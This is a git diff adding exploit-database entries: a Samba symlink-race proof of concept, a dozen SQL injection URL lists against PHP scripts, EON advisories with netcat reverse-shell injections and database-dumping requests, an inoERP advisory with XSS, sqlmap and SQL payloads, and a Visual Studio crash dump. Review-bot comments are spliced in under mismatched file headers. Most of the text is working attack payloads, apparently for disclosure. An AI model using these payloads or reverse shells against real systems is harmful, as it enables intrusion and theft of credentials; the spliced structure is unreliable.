Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] + smb: \> posix + Server supports CIFS extensions 1.0 + Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt + smb: /> ls + . D 0 Wed Dec 14 23:54:30 2016 + .. D 0 Wed Dec 14 13:02:50 2016 + + 98853468 blocks of size 1024. 
66181136 blocks available + smb: /> symlink / link + smb: /> mkdir normal + smb: /> put /tmp/empty normal/secret # empty file + putting file /tmp/empty as /normal/secret (0.0 kb/s) (average 0.0 kb/s) + smb: /> rename_loop link normal foobar + + - Over a second connection, launch the read side of the race: + + $ ./bin/default/source3/client/smbclient -N -U guest //192.168.56.101/public + ./bin/default/source3/client/smbclient: Can't load /usr/local/samba/etc/smb.conf - run testparm to debug it + Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.2-Debian] + smb: \> posix + Server supports CIFS extensions 1.0 + Server supports CIFS capabilities locks acls pathnames posix_path_operations large_read posix_encrypt + smb: /> dump foobar/secret + + - At this point, the race can theoretically be hit. However, because the + renaming client performs operations synchronously, the network latency makes + it hard to win the race. (It shouldn't be too hard to adapt the SMB client to + be asynchronous, which would make the attack much more practical.) To make it + easier to hit the race, log in to the server as root and run "strace" against + the process that is trying to access foobar/secret all the time without any + filtering ("strace -p19624"). On my machine, this causes the race to be hit + every few seconds, and the smbclient that is running the "dump" command + prints the contents of the file each time the race is won. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41740.zip diff --git a/platforms/php/webapps/41724.txt b/platforms/php/webapps/41724.txt new file mode 100755 index 000000000..79327bc35 --- /dev/null +++ b/platforms/php/webapps/41724.txt 
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Just Another Video Script 1.4.3 - SQL Injection
+# Google Dork: N/A
+# Date: 25.03.2017
+# Vendor Homepage: http://justanothervideoscript.com/
+# Software: http://justanothervideoscript.com/demo
+# Demo: http://javsdemo.com/
+# Version: 1.4.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajaxglobalfunc.php?func=addfav&vid_id=[SQL]
+# http://localhost/[PATH]/ajaxglobalfunc.php?func=flag&vid_id=[SQL]
+# http://localhost/[PATH]/ajaxplay.php?vidid=[SQL]
+# # # # #
+
diff --git a/platforms/php/webapps/41725.txt b/platforms/php/webapps/41725.txt
new file mode 100755
index 000000000..46182fd0f
--- /dev/null
+++ b/platforms/php/webapps/41725.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Adult Tube Video Script - SQL Injection
+# Google Dork: N/A
+# Date: 25.03.2017
+# Vendor Homepage: http://www.boysofts.com/
+# Software: http://www3.boysofts.com/xxx/freeadultvideotubescript.zip
+# Demo: http://www.boysofts.com/2013/12/free-adult-tube-video-script.html
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/single-video.php?video_id=[SQL]
+# http://localhost/[PATH]/search.php?page=[SQL]
+# single-video.php?video_id=25404991'+And(SelecT+1+FroM+(SelecT+CoUnT(*),ConCAT((SelecT(SelecT+ConCAT(CAST(DatabasE()+As+ChAr),0x7e,0x496873616e2053656e63616e))+FroM+information_schema.tables+WhErE+table_schema=DatabasE()+LImIt+0,1),FLooR(RanD(0)*2))x+FroM+information_schema.tables+GrOuP+By+x)a)++and+'userip'='userip
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41726.txt b/platforms/php/webapps/41726.txt
new file mode 100755
index 000000000..7462cae59
--- /dev/null
+++ b/platforms/php/webapps/41726.txt
@@ -0,0 +1,21 @@
+# # # # #
+# Exploit Title: Alibaba Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://b2bbusinessdirectoryscript.com/alibaba-clone-script.html
+# Demo: http://thealidemox.com
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41727.txt b/platforms/php/webapps/41727.txt
new file mode 100755
index 000000000..c88584f21
--- /dev/null
+++ b/platforms/php/webapps/41727.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: B2B Marketplace Script v2.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://eaglescripts.com/php-b2b-marketplace-script-v2
+# Demo: http://demob2b.xyz/
+# Version: 2.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/ajax.php?section=count_classified&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_tradeleade&cl_id=[SQL]
+# http://localhost/[PATH]/ajax.php?section=count_product&pro_id=[SQL]
+# Etc...
+# # # # #
+
diff --git a/platforms/php/webapps/41728.txt b/platforms/php/webapps/41728.txt
new file mode 100755
index 000000000..50a31a40a
--- /dev/null
+++ b/platforms/php/webapps/41728.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Real Estate Property Pro Script - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/php-property-portal-script
+# Demo: http://realpro.phpscriptsdemo.com/
+# Version: Pro
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/adsearch.html?&prc_min=[SQL]&prc_max=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41729.txt b/platforms/php/webapps/41729.txt
new file mode 100755
index 000000000..304c9642d
--- /dev/null
+++ b/platforms/php/webapps/41729.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Courier Tracking Software v6.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/courier-tracking-software-ver-6
+# Demo: http://courierv6.couriersoftwares.com/
+# Version: 6.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/eaglecov6.php?c=other&f=show_news_details&view_id=[SQL]
+# http://localhost/[PATH]/eaglecov6.php?c=homepage&f=services&ser_id=[SQL]
+# user:username
+# user:hub_name
+# user:password
+# user:hidden_pass
+# user:entrydate
+# user:onlinestatus
+# user:status
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41730.txt b/platforms/php/webapps/41730.txt
new file mode 100755
index 000000000..29460001b
--- /dev/null
+++ b/platforms/php/webapps/41730.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Parcel Delivery Booking Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/parcel-delivery-booking-script
+# Demo: http://parceldelivery.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/add_booking_shipment_first_step/1/1/1/1[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41731.txt b/platforms/php/webapps/41731.txt
new file mode 100755
index 000000000..ef86973fe
--- /dev/null
+++ b/platforms/php/webapps/41731.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Delux Same Day Delivery Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/delux-same-day-delivery
+# Demo: http://deluxesameday.logistic-softwares.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/show_page/[PAGE][SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41732.txt b/platforms/php/webapps/41732.txt
new file mode 100755
index 000000000..3e24cf7ee
--- /dev/null
+++ b/platforms/php/webapps/41732.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Hotel & Tour Package Script v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: http://www.eaglescripts.com/hotel-booking-script
+# Demo: http://hotelbooking.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?show=view_offer&offer_id=[SQL]
+# http://localhost/[PATH]/view_news.php?news_id=[SQL]
+# http://localhost/[PATH]/page.php?id=[SQL]
+# http://localhost/[PATH]/?show=view_room&room_id=[SQL]
+# admin:id
+# admin:username
+# admin:password
+# booking:id
+# booking:cat_name
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41733.txt b/platforms/php/webapps/41733.txt
new file mode 100755
index 000000000..d6e0528ec
--- /dev/null
+++ b/platforms/php/webapps/41733.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Tour Package Booking v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 26.03.2017
+# Vendor Homepage: http://eagletechnosys.com/
+# Software: www.eaglescripts.com/tour-package-booking-script
+# Demo: http://tourbooking.phpscriptsdemo.com/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/package/category/1[SQL]
+# http://localhost/[PATH]/package_detail/1[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41735.txt b/platforms/php/webapps/41735.txt
new file mode 100755
index 000000000..899348286
--- /dev/null
+++ b/platforms/php/webapps/41735.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Professional Bus Booking Script - SQL Injection
+# Google Dork: N/A
+# Date: 27.03.2017
+# Vendor Homepage: http://travelbookingscript.com/
+# Software: http://travelbookingscript.com/professional-bus-booking-script.html
+# Demo: http://travelbookingscript.com/demo/professional/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41736.txt b/platforms/php/webapps/41736.txt
new file mode 100755
index 000000000..7319083c6
--- /dev/null
+++ b/platforms/php/webapps/41736.txt
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: CouponPHP Script v3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 27.03.2017
+# Vendor Homepage: http://couponphp.com/
+# Software: http://couponphp.com/demos
+# Demo: http://newdemo2.couponphp.com
+# Demo: http://newdemo3.couponphp.com
+# Version: 3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL]
+# users
+# id
+# username
+# password
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41746.txt b/platforms/php/webapps/41746.txt
new file mode 100755
index 000000000..33305c038
--- /dev/null
+++ b/platforms/php/webapps/41746.txt
@@ -0,0 +1,132 @@
+# [CVE-2017-6087] EON 5.0 Remote Code Execution
+
+## Description
+
+EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
+
+## Remote Code Execution (authenticated)
+
+The Eonweb code does not correctly filter arguments, allowing
+authenticated users to execute arbitrary code.
+
+**CVE ID**: CVE-2017-6087
+
+**Access Vector**: remote
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-78
+
+**CVSS Base Score**: 7.6
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
+
+
+### Proof of Concept 1
+
+On the attacker's host, we start a handler:
+
+```
+nc -lvp 1337
+```
+
+The `selected_events` parameter is not correctly filtered before it is
+used by the `shell_exec()` function.
+
+There, it is possible to inject a payload like in the request below,
+where we connect back to our handler:
+
+```
+https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
+```
+
+#### Vulnerable code
+
+The payload gets injected into the `$event[$key]` and `$ged_command`
+variables of the `module/monitoring_ged/ged_functions.php` file, line 373:
+
+```
+$ged_command = "-update -type $ged_type_nbr ";
+foreach ($array_ged_packets as $key => $value) {
+ if($value["type"] == true){
+ if($key == "owner"){
+ $event[$key] = $owner;
+ }
+ $ged_command .= "\"".$event[$key]."\" ";
+ }
+}
+$ged_command = trim($ged_command, " ");
+shell_exec($path_ged_bin." ".$ged_command);
+```
+
+Two other functions in this file are also affected by this problem:
+
+* `delete($selected_events, $queue);`
+* `ownDisown($selected_events, $queue, $global_action);`
+
+
+### Proof of Concept 2
+
+On the attacker's host, we start a handler:
+
+```
+nc -lvp 1337
+```
+
+The `module` parameter is not correctly filtered before it is used by
+the `shell_exec()` function.
+
+Again, we inject our connecting back payload:
+
+```
+https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
+```
+
+#### Vulnerable code
+
+In the `module/index.php` file, line 24, we can see that our payload is
+injected into the `exec()` function without any sanitization:
+
+```
+# Check optionnal module to load
+if(isset($_GET["module"]) && isset($_GET["link"])) {
+
+ $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
+
+ # Redirect to module page if rpm installed
+ if($module!=0) { header('Location: '.$_GET["link"].''); }
+
+}
+```
+
+
+## Timeline (dd/mm/yyyy)
+
+* 01/10/2016 : Initial discovery.
+* 09/10/2016 : Fisrt contact with vendor.
+* 23/10/2016 : Technical details sent to the security contact.
+* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
+* 11/10/2016 : Testing the patch revealed that it needed more work.
+* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
+* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
+repsonsible disclosure agreement.
+* 14/03/2017 : Public disclosure.
+
+Thank you to EON for the fast response.
+
+## Solution
+
+Update to version 5.1
+
+## Affected versions
+
+* Version <= 5.0
+
+## Credits
+
+* Nicolas SERRA
+
+-- SYSDREAM Labs
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
+* Website: https://sysdream.com/ *
+Twitter: @sysdream
\ No newline at end of file
diff --git a/platforms/php/webapps/41747.txt b/platforms/php/webapps/41747.txt
new file mode 100755
index 000000000..8e1c145d5
--- /dev/null
+++ b/platforms/php/webapps/41747.txt
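Review bot: The timeline in this advisory lists "11/10/2016 : Testing the patch revealed that it needed more work" after the 27/10/2016 entry, so either the date or the ordering is wrong; if the retest happened in November, the line should read `* 11/11/2016 : Testing the patch revealed that it needed more work.` (this is inferred from the ordering alone and should be confirmed with the authors). The PoC 1 "Vulnerable code" excerpt also never shows how `selected_events` reaches `$event[$key]`, so a reader cannot verify the stated path from the GET parameter to `shell_exec()`; one sentence naming the intermediate assignment would make the excerpt self-contained. Both PoCs rely on `nc -e`, which many netcat builds omit, so the note "requires a netcat with `-e` support (e.g. nc.traditional)" would save reproducers time.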
@@ -0,0 +1,172 @@
+# [CVE-2017-6088] EON 5.0 Multiple SQL Injection
+
+## Description
+
+EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
+
+## SQL injection (authenticated)
+
+The Eonweb code does not correctly filter arguments, allowing
+authenticated users to inject arbitrary SQL requests.
+
+**CVE ID**: CVE-2017-6088
+
+**Access Vector**: remote
+
+**Security Risk**: medium
+
+**Vulnerability**: CWE-89
+
+**CVSS Base Score**: 6.0
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L
+
+### Proof of Concept 1 (root privileges)
+
+The following HTTP request allows an attacker (connected as
+administrator) to dump the database contents using SQL injections inside
+either the `bp_name` or the `display` parameter. These requests are
+executed with MySQL root privileges.
+
+```
+https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271
+
+https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1
+```
+
+#### Vulnerable code
+
+The vulnerable code can be found inside the
+`module/monitoring_ged/ged_functions.php` file, line 114:
+
+```
+function list_process($bp,$display,$bdd){
+ $sql = "select name from bp where is_define = 1 and name!='".$bp."'
+and priority = '" . $display . "'";
+ $req = $bdd->query($sql);
+ $process = $req->fetchall();
+
+ echo json_encode($process);
+}
+```
+
+### Proof of Concept 2
+
+The following HTTP request allows an attacker to dump the database
+contents using SQL injections inside the `type` parameter:
+
+```
+https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
+```
+
+#### Vulnerable code
+
+The vulnerable code can be found inside the
+`module/monitoring_ged/ajax.php` file, line 64:
+
+```
+if($_GET["type"] == 0){
+ $ged_where = "WHERE pkt_type_id!='0'";
+} else {
+ $ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";
+}
+$gedsql_result1=sqlrequest($database_ged,"SELECT
+pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");
+```
+
+### Proof of Concept 3
+
+The following HTTP request allows an attacker to dump the database
+contents using SQL injections inside the `search` parameter:
+
+```
+https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
+```
+
+
+#### Vulnerable code
+
+The vulnerable code can be found inside the
+`module/monitoring_ged/ged_functions.php` file, line 129.
+
+```
+if($search != ""){
+ $like = "";
+ if( substr($search, 0, 1) === '*' ){
+ $like .= "%";
+ }
+ $like .= trim($search, '*');
+ if ( substr($search, -1) === '*' ) {
+ $like .= "%";
+ }
+
+ $where_clause .= " AND $filter LIKE '$like'";
+}
+```
+
+
+### Proof of Concept 4
+
+The following HTTP request allows an attacker to dump the database
+contents using SQL injections inside the `equipment` parameter:
+
+```
+https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit
+1)&queue=history
+```
+
+
+#### Vulnerable code
+
+The vulnerable code can be found inside the
+`module/monitoring_ged/ged_functions.php` file, line 493:
+
+```
+$gedsql_result1=sqlrequest($database_ged,"SELECT
+pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND
+pkt_type_id<'100';");
+
+
+while($ged_type = mysqli_fetch_assoc($gedsql_result1)){
+ $sql = "SELECT DISTINCT $filter FROM
+".$ged_type["pkt_type_name"]."_queue_".$queue;
+
+ $results = sqlrequest($database_ged, $sql);
+ while($result = mysqli_fetch_array($results)){
+ if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){
+ array_push($datas, $result[$filter]);
+ }
+ }
+}
+```
+
+
+## Timeline (dd/mm/yyyy)
+
+* 01/10/2016 : Initial discovery.
+* 09/10/2016 : Fisrt contact with vendor.
+* 23/10/2016 : Technical details sent to the security contact.
+* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
+* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
+* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
+repsonsible disclosure agreement.
+* 14/03/2017 : Public disclosure.
+
+Thank you to EON for the fast response.
+
+## Solution
+
+Update to version 5.1.
+
+## Affected versions
+
+* Version <= 5.0
+
+## Credits
+
+* Nicolas SERRA
+
+-- SYSDREAM Labs
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
+* Website: https://sysdream.com/
+* Twitter: @sysdream
\ No newline at end of file
diff --git a/platforms/php/webapps/41749.txt b/platforms/php/webapps/41749.txt
new file mode 100755
index 000000000..a48e4d168
--- /dev/null
+++ b/platforms/php/webapps/41749.txt
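Review bot: Proof of Concept 4 says the injection is "inside the `equipment` parameter", but the request it shows injects through `filter=(select+user_passwd+...)`, and the quoted code interpolates `$filter` unquoted into `SELECT DISTINCT $filter FROM ...`; the sentence should read `contents using SQL injections inside the `filter` parameter:`. The same `$filter` is also interpolated unquoted in the PoC 3 excerpt (`" AND $filter LIKE '$like'"`), so `filter` is injectable on the `ajax.php` endpoint as well, which the advisory does not state. The PoC 1 code is attributed to `module/monitoring_ged/ged_functions.php` while the request targets `module/admin_bp/php/function_bp.php`; this looks like a copy-paste of the path from the later sections and is worth confirming against the 5.0 tree.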
@@ -0,0 +1,157 @@
+=== FOXMOLE - Security Advisory 2017-01-25 ===
+
+inoERP - Multiple Issues
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Affected Versions
+=================
+inoERP 0.6.1
+
+Issue Overview
+==============
+Vulnerability Type: SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Session Fixation
+Technical Risk: critical
+Likelihood of Exploitation: medium
+Vendor: inoERP
+Vendor URL: http://inoideas.org/ / https://github.com/inoerp/inoERP
+Credits: FOXMOLE employee Tim Herres
+Advisory URL: https://www.foxmole.com/advisories/foxmole-2017-01-25.txt
+Advisory Status: Public
+OVE-ID: OVE-20170126-0002
+CVSS 2.0: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
+
+
+Impact
+======
+There are multiple SQL Injection vulnerabilities, exploitable without authentication.
+An attacker could use the SQL Injection to access the database in an unsafe way.
+This means there is a high impact to all applications.
+The inoERP software also lacks in input validation resulting in different reflected/stored XSS vulnerabilities.
+
+
+Issue Description
+=================
+The following findings are only examples, there are quite more. The whole application should be reviewed.
+
+All items tested using FF52.
+
+1.) Cross Site Scripting:
+Stored:
+Create a new Question in the -->Forum --> Ask a question
+Vulnerable fields : Title, Content
+Used Payload: Test
+
+Response:
+[...]
+ Test<script>alert("xss")</script> - inoERP!
+[...]
+
+The latest questions are included in the start page which means the entered payload gets executed directly in the start page.
+
+Reflected:
+With Auth:
+http://192.168.241.143/inoerp/form.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&mode=9&user_id=7
+http://192.168.241.143/inoerp/includes/json/json_blank_search.php?class_name=content&content_type_id=49&window_type=%22%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)
+%3C/scRipt%3E
+http://192.168.241.143/inoerp/program.php?class_name=%3CscRipt%3Ealert(%22xss%22)%3C%2fscRipt%3E&program_name=prg_all_combinations&program_type=download_report
+
+Unauthenticated:
+http://192.168.241.143/inoerp/index.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%22xss%22)%3C/scRipt%3E
+
+2.) No protection against Cross Site Request Forgery Attacks:
+PoC: Changing the admin user credentials.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+[..snipped...]
+
+If a privileged user activates the request, the admin user id=1 is set to "test".
+
+3.) SQL Injection:
+Auth required:No
+#####
+http://192.168.241.143/inoerp/form.php?
+Parameter: module_code (GET)
+ Type: boolean-based blind
+ Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+ Payload: module_code=test' RLIKE (SELECT (CASE WHEN (2838=2838) THEN
+0x74657374 ELSE 0x28 END))-- qkmO
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+ Payload: module_code=test' AND (SELECT 8706 FROM(SELECT
+COUNT(*),CONCAT(0x716b7a6271,(SELECT
+(ELT(8706=8706,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NPEq
+
+ Type: stacked queries
+ Title: MySQL > 5.0.11 stacked queries (comment)
+ Payload: module_code=test';SELECT SLEEP(5)#
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 OR time-based blind
+ Payload: module_code=test' OR SLEEP(5)-- STgC
+
+Exploitable using e.g. SQLMAP
+
+Blind SQL Injection:
+sqlmap -u
+"http://192.168.241.143/inoerp/content.php?content_type%5b%5d=test&search_text=3&search_document_list%5b%5d=all"
+ -p "content_type%5b%5d" --dbms="MySQL"
+Parameter: content_type[] (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause
+ Payload: content_type[]=-8366' OR 7798=7798 AND
+'eanR'='eanR&search_text=3&search_document_list[]=all
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 OR time-based blind
+ Payload: content_type[]=test' OR SLEEP(5) AND
+'exIO'='exIO&search_text=3&search_document_list[]=all
+#####
+
+4.) Session Fixation:
+After a successful login the SessionID PHPSESSID remains the same:
+Before Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
+After Login: INOERP123123=t4e5ef5kqnv6d1u2uguf7lraa2
+
+
+
+
+Temporary Workaround and Fix
+============================
+FOXMOLE advises to restrict the access to all vulnerable inoERP systems until all vulnerabilities are fixed.
+
+
+
+History
+=======
+2017-01-25 Issue discovered
+2017-01-26 Vendor contacted -> no response
+2017-02-20 Vendor contacted again -> no response
+2017-03-06 Vendor contacted again -> no response
+2017-03-27 Advisory Release
+
+
+GPG Signature
+=============
+This advisory is signed with the GPG key of the FOXMOLE advisories team.
+The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc
\ No newline at end of file
diff --git a/platforms/windows/dos/41734.c b/platforms/windows/dos/41734.c
new file mode 100755
index 000000000..c99ba4ac9
--- /dev/null
+++ b/platforms/windows/dos/41734.c
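Review bot: The CSRF proof of concept in section 2.) is empty as committed: between "PoC: Changing the admin user credentials." and "[..snipped...]" the file holds only blank lines, so the request that sets admin user id=1 to "test" cannot be reproduced from this file (the HTML form was presumably lost when the advisory was imported, which should be checked against the advisory URL given in the header). The Session Fixation section names the cookie "PHPSESSID" while the before/after values shown are for a cookie called INOERP123123; the sentence should read `After a successful login the session cookie INOERP123123 remains the same:`. The stored-XSS "Used Payload: Test" line has also lost its script tag, since the response excerpt shows `Test<script>alert("xss")</script>`, so the payload line no longer matches the response it is meant to explain.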
@@ -0,0 +1,177 @@ +# Exploit Title: Microsoft Visual Studio 2015 update 3 – Stack overflow +# Date: 2017-03-26 +# Exploit Author: Peter Baris +# Vendor Homepage: http://www.saptech-erp.com.au +# Software Link: https://www.visualstudio.com/thank-you-downloading-visual-studio/?sku=Community&rel=15 +# Version: Visual Studio 2015 update 3 +# Tested on: Windows 7 Pro SP1 x64, Windows 10 Pro x64 + + + +Windbg output + + + +Crash 1: + + + +eax=1469f040 ebx=00000000 ecx=1469f040 edx=165f4634 esi=1469f040 edi=0036e2d8 + +eip=16610c9d esp=00279000 ebp=0027900c iopl=0 nv up ei pl zr na pe nc + +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 + + + +VCProject!CVCNode::GetVCProject+0x49: + + + +16610c9d ff523c call dword ptr [edx+3Ch] ds:002b:165f4670={VCProject!CVCNode::GetVCProject (16610c64)} + + + + + +0:000> !exchain + +0036e2dc: VCProject!memcmp+86f5 (166956e8) + +0036e30c: VCProject!memcmp+876b (166957b0) + +0036e384: msenv!_aulldiv+476d1 (31e3d818) + +0036e424: msenv!_aulldiv+1567e (31df2c66) + +0036e478: msenv!_aulldiv+65abf (31e6a010) + +0036e4c4: vcpkg!sqlite3_value_type+1f3a (3940ac50) + +0036e530: msenv!_aulldiv+2b169 (31e135dc) + +0036e578: msenv!_aulldiv+2bb07 (31e145ac) + +0036e5cc: msenv!_aulldiv+2b1de 